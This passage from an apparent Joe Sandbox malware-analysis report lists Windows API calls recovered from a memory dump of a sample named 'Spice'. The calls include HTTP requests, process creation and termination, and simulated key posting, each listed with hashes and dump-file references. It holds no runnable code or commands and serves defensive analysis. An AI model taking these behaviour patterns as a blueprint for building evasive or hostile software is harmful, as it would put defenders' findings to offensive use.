                                                                                                                                                                                                                                        • Part of subcall function 00EE2B4F: SetEvent.KERNEL32(?,?,00EE1EE3,00000000,00000000,00000001), ref: 00EE2B79
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2603140658-3916222277
                                                                                                                                                                                                                                      • Opcode ID: ab220f53be5dc2eee0f4b18ff22f0b3d40ba1cdaa4d83739b21ef416e8c486fd
                                                                                                                                                                                                                                      • Instruction ID: 7f2a1051eee8dcbb1015f7ea2df77e536e86feb44f5a2eed55171c3a583ac5ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab220f53be5dc2eee0f4b18ff22f0b3d40ba1cdaa4d83739b21ef416e8c486fd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93416CB150124CBFEB129F61CC89FBB7BACFB08354F00511AFB05AA251DB759E449BA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F00980), ref: 00EE9412
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F00980), ref: 00EE9446
                                                                                                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EE95C0
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00EE95EA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 560350794-0
                                                                                                                                                                                                                                      • Opcode ID: a1031fc3c52932ad2edb740ff353aab10f5e391a5d7c29673241e76f8168510d
                                                                                                                                                                                                                                      • Instruction ID: 32b59a3ccc3203b95ef01598a58ce086afe69d863a97204c1d72d9b8b876814d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1031fc3c52932ad2edb740ff353aab10f5e391a5d7c29673241e76f8168510d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31F12C71A00209EFCF14DFA5C884EAEB7B9FF49314F109459F916AB251DB31AE46CB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EEFD9E
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFF31
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFF55
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFF95
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFFB7
                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EF0133
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EF0165
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EF0194
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EF020B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4090791747-0
                                                                                                                                                                                                                                      • Opcode ID: a465b79d422a8087c5b6d814ae5b4b07e82539ac50a16959ed3d7fa157382a38
                                                                                                                                                                                                                                      • Instruction ID: eacabde774028b953bac334764b2dd2825b8ea3e903a9b73523c3a12ff2f9100
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a465b79d422a8087c5b6d814ae5b4b07e82539ac50a16959ed3d7fa157382a38
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83E1B031204345DFCB15EF24C891B6ABBE1EF85314F14985DF999AB2A2DB31EC41CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ED4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED3B8A,?), ref: 00ED4BE0
                                                                                                                                                                                                                                        • Part of subcall function 00ED4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED3B8A,?), ref: 00ED4BF9
                                                                                                                                                                                                                                        • Part of subcall function 00ED4FEC: GetFileAttributesW.KERNEL32(?,00ED3BFE), ref: 00ED4FED
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00ED52FB
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ED5315
                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00ED5330
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 793581249-0
                                                                                                                                                                                                                                      • Opcode ID: 31892526d5aa4a310d6ad60533e6fd0ae2f0e35a8ee07af3ace36b46ce79f77d
                                                                                                                                                                                                                                      • Instruction ID: 473980dd558b708ea57b46a32d434d2b7a04f20fb84d6357c24c81b3ade78422
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31892526d5aa4a310d6ad60533e6fd0ae2f0e35a8ee07af3ace36b46ce79f77d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A55166B21087859BC724EBA0D8819DFB3ECEF85300F50591FF189E3152EF35A6898756
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EF8D24
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                                                                                      • Opcode ID: cd6b67cd430f1a24f0d8ca03d61728a6a833388d19ffde977af233b653cade94
                                                                                                                                                                                                                                      • Instruction ID: 5e771902f1de12edeb1205bd69cb5dd46ac55aeda8101ac064300e78f58a072e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd6b67cd430f1a24f0d8ca03d61728a6a833388d19ffde977af233b653cade94
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2518F3064020CAFEF249F28CE89BB97BA5AB05314F246516F715FA1E1CF72A950DA51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EAC638
                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EAC65A
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EAC672
                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EAC690
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EAC6B1
                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000), ref: 00EAC6C0
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EAC6DD
                                                                                                                                                                                                                                      • DestroyIcon.USER32(?), ref: 00EAC6EC
                                                                                                                                                                                                                                        • Part of subcall function 00EFAAD4: DeleteObject.GDI32(00000000), ref: 00EFAB0D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2819616528-0
                                                                                                                                                                                                                                      • Opcode ID: 35c9a3781dddf07b1250dfdc4cbe1e45c703445b98d6a086322073d20f8766cc
                                                                                                                                                                                                                                      • Instruction ID: c5b97142a8b548af27d9fddee9ee252690aaeefe932893d459144544084eb065
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35c9a3781dddf07b1250dfdc4cbe1e45c703445b98d6a086322073d20f8766cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33513B70600209AFDB24DF24CC45BAA77F5FB58714F20951DFA4ABB290DB71AD90EB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ECB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECB54D
                                                                                                                                                                                                                                        • Part of subcall function 00ECB52D: GetCurrentThreadId.KERNEL32 ref: 00ECB554
                                                                                                                                                                                                                                        • Part of subcall function 00ECB52D: AttachThreadInput.USER32(00000000,?,00ECA23B,?,00000001), ref: 00ECB55B
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ECA246
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ECA263
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ECA266
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ECA26F
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ECA28D
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ECA290
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ECA299
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ECA2B0
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ECA2B3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2014098862-0
                                                                                                                                                                                                                                      • Opcode ID: 17e6b054b54b25f2e9e726a11c5fe6f67ccdf1ad80eaf86b568219eda2c96c68
                                                                                                                                                                                                                                      • Instruction ID: be2f12fda76f1528c3a3610629f06bb8f431aae23eee6cf798ccaa352a08d7a7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17e6b054b54b25f2e9e726a11c5fe6f67ccdf1ad80eaf86b568219eda2c96c68
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B11E1B195021CBEF7206F609C8AF6A3B6EEB4C754F101419F7446B0E1CEF35C51AAA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EC915A,00000B00,?,?), ref: 00EC94E2
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00EC915A,00000B00,?,?), ref: 00EC94E9
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EC915A,00000B00,?,?), ref: 00EC94FE
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00EC915A,00000B00,?,?), ref: 00EC9506
                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00EC915A,00000B00,?,?), ref: 00EC9509
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EC915A,00000B00,?,?), ref: 00EC9519
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00EC915A,00000000,?,00EC915A,00000B00,?,?), ref: 00EC9521
                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00EC915A,00000B00,?,?), ref: 00EC9524
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00EC954A,00000000,00000000,00000000), ref: 00EC953E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1957940570-0
                                                                                                                                                                                                                                      • Opcode ID: 56501b6b8fd77d1813381cde384158fdd805600fac00331730c9a84d2ca6a2af
                                                                                                                                                                                                                                      • Instruction ID: 5d9b53a0e8f95f32cd1871b2b25d0af92fe822c7d610a8ac13bb6a83ebb1be58
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56501b6b8fd77d1813381cde384158fdd805600fac00331730c9a84d2ca6a2af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4701B6B5240308BFEB20AFA5DC4DF6B7BACFB89711F008411FA05DB2A1CA719800DB20
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                      • API String ID: 0-572801152
                                                                                                                                                                                                                                      • Opcode ID: cd09eb180d7eaf8cbaceb3c7bfc00b597a691768ea468efa07c2116d1784ade9
                                                                                                                                                                                                                                      • Instruction ID: a17182c4f59ee31444a8618b286a8cec66b28ec7909f753bfaf3f537f3f8d943
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd09eb180d7eaf8cbaceb3c7bfc00b597a691768ea468efa07c2116d1784ade9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6C19D71A0025E9FDF10CFA9C884AAEB7F5BB48304F18947DE915BB280E770AD45CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                      • API String ID: 2862541840-625585964
                                                                                                                                                                                                                                      • Opcode ID: c42e03b4dc79492699cd6b2d66ec147ede5c2fe51f4f4cad68b7dc9a6ee2701e
                                                                                                                                                                                                                                      • Instruction ID: 660f9f204bdbf674744438fa973d9b6994ea1d2815373f4d0f88a4f72b588ad5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c42e03b4dc79492699cd6b2d66ec147ede5c2fe51f4f4cad68b7dc9a6ee2701e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30918D70A00259ABDF24CFA6C844FEEBBF8EF85714F10955DE519BB292D7709940CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EF7449
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00EF745D
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EF7477
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00EF74D2
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EF74E9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EF7517
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                                                                                                                                      • Opcode ID: 4f068222d0966981c27f11b3fb0c9a81a591191c0ecc2603e82db342eb4f2dc2
                                                                                                                                                                                                                                      • Instruction ID: 16d58b281d0593bbb79e3eb9d3e5c76d9782d4f441f466114b89455075fc87d6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f068222d0966981c27f11b3fb0c9a81a591191c0ecc2603e82db342eb4f2dc2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6641C170A0430CAFEB219F64CC85FEE77E9EF08354F10542AFA94A7291D6719D84DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ED4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00ED416D
                                                                                                                                                                                                                                        • Part of subcall function 00ED4148: Process32FirstW.KERNEL32(00000000,?), ref: 00ED417B
                                                                                                                                                                                                                                        • Part of subcall function 00ED4148: FindCloseChangeNotification.KERNEL32(00000000), ref: 00ED4245
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEF08D
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EEF0A0
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEF0CF
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EEF14C
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00EEF157
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EEF18C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
